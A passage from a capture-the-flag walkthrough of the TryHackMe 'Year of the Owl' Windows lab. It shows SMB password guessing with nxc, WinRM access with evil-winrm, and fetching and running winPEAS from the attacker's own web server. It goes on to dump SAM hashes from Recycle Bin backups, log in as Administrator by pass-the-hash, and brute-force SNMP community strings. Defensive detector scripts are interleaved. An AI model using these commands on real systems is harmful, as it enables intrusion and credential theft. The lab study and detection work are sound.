SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:javier STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:789456123 STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:123654 STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [+] year-of-the-owl\Jareth:[cracked_password]
And with that, we succeeded in guessing Jareth's password.
Let's verify whether it actually works against Samba.
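From the defender's side, the sequence above (a run of failed network logons for one account from one source, then a success) is exactly what a password-guessing detection should key on. Added example, not from the room: a small detector over constructed Windows Security event records (EventID 4625 and 4624 with LogonType 3) in the field order time,EventID,TargetUserName,LogonType,IpAddress.

```python
"""Flag SMB/WinRM password guessing in Windows Security events.

Added example, not part of the room. SAMPLE_EVENTS is constructed to mirror
the nxc run above: a burst of 4625 failures for one account from one source,
then a 4624 success. Record layout: time,EventID,TargetUserName,LogonType,IpAddress.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

SAMPLE_EVENTS = """\
2026-05-05T12:50:00Z,4625,Jareth,3,10.50.100.7
2026-05-05T12:50:00Z,4625,Jareth,3,10.50.100.7
2026-05-05T12:50:01Z,4625,Jareth,3,10.50.100.7
2026-05-05T12:50:01Z,4625,Jareth,3,10.50.100.7
2026-05-05T12:50:02Z,4625,Jareth,3,10.50.100.7
2026-05-05T12:50:02Z,4625,Jareth,3,10.50.100.7
2026-05-05T12:50:03Z,4624,Jareth,3,10.50.100.7
2026-05-05T12:55:00Z,4625,Administrator,3,10.50.100.9
2026-05-05T13:40:00Z,4624,Jareth,3,10.50.100.9
"""


def parse_events(text: str) -> list:
    """Parse the constructed CSV records into (time, event_id, user, logon_type, ip)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, ltype, ip = line.split(",")
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       int(eid), user, int(ltype), ip))
    return events


def detect(events, threshold: int = 5, window: timedelta = timedelta(seconds=60)) -> list:
    """Per (source IP, account): alert once `threshold` 4625s fall inside `window`,
    and again if a 4624 for the same pair arrives within `window` of that alert."""
    recent = defaultdict(deque)   # (ip, user) -> times of recent failures
    flagged = {}                  # (ip, user) -> time the burst was flagged
    alerts = []
    for ts, eid, user, ltype, ip in sorted(events):
        if ltype != 3:            # only network logons (SMB, WinRM) are of interest here
            continue
        key = (ip, user)
        q = recent[key]
        while q and ts - q[0] > window:
            q.popleft()           # drop failures that fell out of the window
        if eid == 4625:
            q.append(ts)
            if len(q) >= threshold and key not in flagged:
                flagged[key] = ts
                alerts.append(("brute_force", ip, user, len(q)))
        elif eid == 4624 and key in flagged and ts - flagged[key] <= window:
            alerts.append(("success_after_brute_force", ip, user, len(q)))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

An account lockout threshold lower than the detector's threshold would have stopped the nxc run above before it reached the right entry of rockyou.txt.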
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u Jareth -p [cracked_password] --shares
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [+] year-of-the-owl\Jareth:sarah
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Enumerated shares
SMB [target_ip] 445 YEAR-OF-THE-OWL Share Permissions Remark
SMB [target_ip] 445 YEAR-OF-THE-OWL ----- ----------- ------
SMB [target_ip] 445 YEAR-OF-THE-OWL ADMIN$ Remote Admin
SMB [target_ip] 445 YEAR-OF-THE-OWL C$ Default share
SMB [target_ip] 445 YEAR-OF-THE-OWL IPC$ READ Remote IPC
We also check winrm.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc winrm [target_ip] -u Jareth -p [cracked_password]
WINRM [target_ip] 5985 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM [target_ip] 5985 YEAR-OF-THE-OWL [+] year-of-the-owl\Jareth:[cracked_password] (Pwn3d!)
Access turned out to be possible.
Let's actually try to get in.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ evil-winrm -i [target_ip] -u Jareth -p [cracked_password]
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Jareth\Documents>
Login succeeded.
user.txt is inside C:\Users\Jareth\Desktop, so we can obtain the User Flag.
*Evil-WinRM* PS C:\Users\Jareth\Desktop> dir
Directory: C:\Users\Jareth\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:21 AM 80 user.txt
*Evil-WinRM* PS C:\Users\Jareth\Desktop> cat user.txt
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXX}
User Flag
Answer: THM{XXXXXXXXXXXXXXXXXXXXXXXXXXX}
Privilege Escalation
Let's check what privileges this account actually has.
*Evil-WinRM* PS C:\Users\Jareth\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== =============================================
year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Nothing of note, so let's look with winpeas.
┌──(rikuxx㉿kali)-[/usr/share/peass]
└─$ winpeas
> peass ~ Privilege Escalation Awesome Scripts SUITE
/usr/share/peass/winpeas
├── winPEAS.bat
├── winPEAS.ps1
├── winPEASany.exe
├── winPEASany_ofs.exe
├── winPEASx64.exe
├── winPEASx64_ofs.exe
├── winPEASx86.exe
└── winPEASx86_ofs.exe
┌──(rikuxx㉿kali)-[/usr/share/peass/winpeas]
└─$ ls
winPEAS.bat winPEAS.ps1 winPEASany.exe winPEASany_ofs.exe winPEASx64.exe winPEASx64_ofs.exe winPEASx86.exe winPEASx86_ofs.exe
┌──(rikuxx㉿kali)-[/usr/share/peass/winpeas]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
[target_ip] - - [06/May/2026 00:42:56] "GET /winPEASx64.exe HTTP/1.1" 200 -
*Evil-WinRM* PS C:\Users\Jareth> iwr -uri http://<自分のKaliのIP>/winPEASx64.exe -OutFile wp.exe
*Evil-WinRM* PS C:\Users\Jareth> .\wp.exe
However, the output was far too long, so I only looked at the parts that caught my attention.
Still, I couldn't make sense of it, so I went back to other writeups once more.
Apparently my way of enumerating was wrong.
Without administrator privileges you can't see other users' SIDs, so I'll focus on my own SID.
*Evil-WinRM* PS C:\Users\Jareth> whoami /all | Select-String -Pattern "jareth" -Context 2,0
User Name SID
====================== =============================================
> year-of-the-owl\jareth S-1-5-21-1987495829-1628902820-919763334-1001
Found it.
Also, this lab apparently uses the Recycle Bin as its theme, so let's take a look at it.
*Evil-WinRM* PS C:\Users\Jareth> cd 'C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001'
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> dir
Directory: C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
You probably wouldn't find this in a normal run. I think it's quite hard.
I'll download them.
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> copy .\sam.bak C:\Users\Jareth\sam.bak
*Evil-WinRM* PS C:\$Recycle.bin\S-1-5-21-1987495829-1628902820-919763334-1001> copy .\system.bak C:\Users\Jareth\system.bak
*Evil-WinRM* PS C:\Users\Jareth> download ./system.bak
Info: Downloading C:\Users\Jareth\system.bak to system.bak
Info: Download successful!
*Evil-WinRM* PS C:\Users\Jareth> download ./sam.bak
Info: Downloading C:\Users\Jareth\sam.bak to sam.bak
I was indeed able to extract the NTLM hashes with impacket-secretsdump.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ impacket-secretsdump -sam sam.bak -system system.bak LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:[AdministratorのNTLMハッシュ]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435
Using that NTLM hash, I was able to log in as Administrator.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ evil-winrm -i [target_ip] -u Administrator -H [AdministratorのLMハッシュ]
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
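As an added example (not from the original writeup), here is a Python check a defender could run over a copy of a suspicious directory such as the $Recycle.Bin folder above: it identifies registry hive files by the "regf" signature they all start with rather than by name, so sam.bak and system.bak are flagged even though their names don't look like hives. The directory tree, file contents and file names are constructed inline.

```python
# Added example (not from the original writeup): find copies of registry hives
# (like the sam.bak / system.bak above) by their "regf" signature, not their name.
import os
import tempfile

HIVE_MAGIC = b"regf"  # every Windows registry hive file starts with these 4 bytes

def is_registry_hive(path):
    """True if the file begins with the 'regf' hive signature."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == HIVE_MAGIC
    except OSError:
        return False

def find_stray_hives(root):
    """Walk `root` and return sorted root-relative paths of hive files, whatever
    their extension. Hives belong under %SystemRoot%\\System32\\config; copies in
    a Recycle Bin or a user profile are worth an alert."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if is_registry_hive(full):
                hits.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(hits)

def build_sample_tree():
    """Constructed sample: a fake $Recycle.bin holding two hive copies plus noise."""
    root = tempfile.mkdtemp()
    sid_dir = os.path.join(root, "$Recycle.bin", "S-1-5-21-1987495829-1628902820-919763334-1001")
    os.makedirs(sid_dir)
    samples = {
        os.path.join(sid_dir, "sam.bak"): HIVE_MAGIC + b"\x00" * 60,  # hive header, rest zeroed
        os.path.join(sid_dir, "system.bak"): HIVE_MAGIC + b"\x00" * 60,
        os.path.join(sid_dir, "notes.txt"): b"plain text, not a hive",
        os.path.join(root, "backup.bak"): b"PK\x03\x04 a zip named .bak",  # extension lies
    }
    for path, content in samples.items():
        with open(path, "wb") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for hit in find_stray_hives(build_sample_tree()):
        print("possible registry hive copy:", hit)
```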
admin.txt is in C:\Users\Administrator\Desktop, and the Admin Flag can be obtained from it.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:19 AM 80 admin.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type admin.txt
THM{YYYYYYYYYYYYYYYYYYYYYYYYYYYYYY}
Admin Flag
Answer: THM{YYYYYYYYYYYYYYYYYYYYYYYYYYYYYY}
Conclusion
This time I solved one of the more complex Active Directory challenges. It was genuinely hard.
In particular, the SNMP part and the enumeration needed for privilege escalation had a very CTF-like feel.
All in all, it was fun.
Tips
What is SNMP?
SNMP (Simple Network Management Protocol) is an application-layer protocol for monitoring and controlling, over the network, communication devices connected to a TCP/IP network, such as routers, switches and servers. By using SNMP you can monitor the network devices you have deployed, so when a network failure occurs you can quickly pinpoint which device failed, which helps speed up recovery.
Source: https://www.infraexpert.com/study/tcpip21.html#google_vignette
So there is a UDP-based protocol like this.
What is an SNMP community?
An SNMP community is the scope of the network systems managed via SNMP. An SNMP manager and an SNMP agent can share information by using the same community name. Setting a different community name for each monitored target makes management more efficient and separates access permissions.
Source: https://www.infraexpert.com/study/tcpip21.5.html
So SNMP has a concept of communities, and each one is identified by a name.
SNMP scanning techniques and cheat sheet
The following tools are used to scan SNMP.
This tool is to SNMP what NMAP is to port scanning: it sends SNMP requests for the sysDescr value asynchronously, with a user-adjustable send interval, and logs the responses, which describe the software running on the device.
This tool is like Gobuster or enum4linux: it scans target hosts using the public SNMP community strings.
Quick workflow
- Use onesixtyone to see how the SNMP service behaves; if you have a wordlist of SNMP community names, use it for brute forcing
- Once you have identified the SNMP community name, examine it in detail with snmp-check; this lets you collect usernames
Cheat sheet
Brute-forcing SNMP community names
$ onesixtyone -c <SNMPコミュニティ名のワードリストファイル> [Host]
Command that enumerates details using the identified SNMP community name
$ snmp-check [Host/IP] -c <特定したSNMPコミュニティ名>
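As an added example (not from the original writeup, nor code from onesixtyone or snmp-check), the Python below shows the mechanics behind the cheat sheet from the defender's side: it encodes the sysDescr.0 GetRequest that a community sweep sends, decodes the version and community name from SNMPv1/v2c datagrams, and flags sources that cycle through many distinct community names, which is what a onesixtyone run against a wordlist looks like on the wire. The IP addresses, community names and the threshold of 5 are constructed assumptions.

```python
# Added example (not from the original writeup): decode SNMPv1/v2c headers,
# build the sysDescr.0 GetRequest onesixtyone sends, and flag community sweeps.
from collections import defaultdict
def _ber_len(buf, i):
    """Decode a BER length at buf[i]; return (length, index after it)."""
    if buf[i] < 0x80:
        return buf[i], i + 1
    n = buf[i] & 0x7F
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n

def parse_snmp_header(pkt):
    """(version, community) from SEQUENCE { INTEGER, OCTET STRING, PDU }.
    The community is cleartext: guessable by a scanner, readable by a sensor."""
    if not pkt or pkt[0] != 0x30:
        raise ValueError("not an SNMP message")
    _, i = _ber_len(pkt, 1)
    if pkt[i] != 0x02:
        raise ValueError("expected INTEGER version")
    ln, i = _ber_len(pkt, i + 1)
    version, i = int.from_bytes(pkt[i:i + ln], "big"), i + ln  # 0 = v1, 1 = v2c
    if pkt[i] != 0x04:
        raise ValueError("expected OCTET STRING community")
    ln, i = _ber_len(pkt, i + 1)
    return version, pkt[i:i + ln].decode("latin-1")

def build_get_sysdescr(community, version=1):
    """Encode a GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0); v2c by default."""
    oid = bytes([0x06, 0x08, 0x2B, 0x06, 0x01, 0x02, 0x01, 0x01, 0x01, 0x00])
    varbind = bytes([0x30, len(oid) + 2]) + oid + b"\x05\x00"  # OID, NULL value
    pdu_body = b"\x02\x01\x01\x02\x01\x00\x02\x01\x00" + bytes([0x30, len(varbind)]) + varbind
    pdu = bytes([0xA0, len(pdu_body)]) + pdu_body  # 0xA0 = GetRequest-PDU; req-id 1, no error
    body = bytes([0x02, 0x01, version, 0x04, len(community)]) + community.encode("latin-1") + pdu
    return bytes([0x30, len(body)]) + body

def detect_community_bruteforce(packets, threshold=5):
    """Return [(src, n)] for sources using >= threshold distinct communities, largest n first."""
    seen = defaultdict(set)
    for src, pkt in packets:
        try:
            seen[src].add(parse_snmp_header(pkt)[1])
        except (ValueError, IndexError):
            continue  # not SNMP, or truncated: ignore
    hits = [(s, len(c)) for s, c in seen.items() if len(c) >= threshold]
    return sorted(hits, key=lambda t: -t[1])

# Constructed sample: one poller with a single community, one scanner cycling a wordlist.
SAMPLE_TRAFFIC = [("10.0.0.5", build_get_sysdescr("monitoring"))] * 3 + [
    ("10.0.0.99", build_get_sysdescr(c)) for c in
    ("public", "private", "openview", "cisco", "community", "admin")
] + [("10.0.0.7", b"\x00junk")]
```

Running `detect_community_bruteforce(SAMPLE_TRAFFIC)` reports only the scanning source; the poller with its single community string is left alone.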